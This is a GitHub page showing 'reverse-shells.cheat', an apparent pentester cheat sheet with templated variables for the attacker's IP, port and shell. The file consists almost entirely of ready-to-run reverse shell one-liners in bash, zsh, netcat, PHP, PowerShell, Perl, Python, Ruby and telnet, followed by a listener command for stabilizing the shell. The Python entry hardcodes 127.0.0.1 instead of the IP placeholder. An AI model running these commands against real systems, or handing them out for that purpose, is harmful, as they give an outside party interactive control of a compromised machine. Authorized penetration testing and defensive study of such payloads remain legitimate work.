-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathreverse-shells.cheat
46 lines (24 loc) · 2.04 KB
/
reverse-shells.cheat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
% Reverse Shells
$ local_ip: echo $(ip -br a sh dev tun0 2>/dev/null||ip -br a sh dev eth0) | awk '{print $3}' | cut -d '/' -f1
$ port: echo '443 1234 4444 32000' | tr ' ' '\n'
$ shell: echo '/bin/bash /bin/zsh /bin/ash /bin/dash /bin/ksh /bin/sh bash zsh ash dash ksh sh' | tr ' ' '\n'
# bash
bash -c 'exec <shell> -i &>/dev/tcp/<local_ip>/<port> <&1'
# zsh
zsh -c 'zmodload zsh/net/tcp && ztcp <local_ip> <port> && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
# netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|<shell> -i 2>&1|nc <local_ip> <port> >/tmp/f
# php
php -r '$sock=fsockopen("<local_ip>","<port>");exec("<shell> -i <&3 >&3 2>&3");'
# powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<local_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# perl
perl -e 'use Socket;$i="<local_ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("<shell> -i");};'
# python
python -c 'import os,pty,socket,sys;s=socket.socket();s.connect((("127.0.0.1"),int("<port>")));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("<shell>");'
# ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<local_ip>","<port>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# telnet
TF=$(mktemp -u); mkfifo $TF && telnet <local_ip> <port> 0<$TF | <shell> 1>$TF
# stabilized fancy beefy gordita crunch shell
stty raw -echo; (echo 'python3 -c "import pty;pty.spawn(\"<shell>\")" || python -c "import pty;pty.spawn(\"<shell>\")"' ;echo "stty$(stty -a | awk -F ';' '{print $2 $3}' | head -n 1)"; echo reset; echo id;cat) | nc -lvnp <port> && reset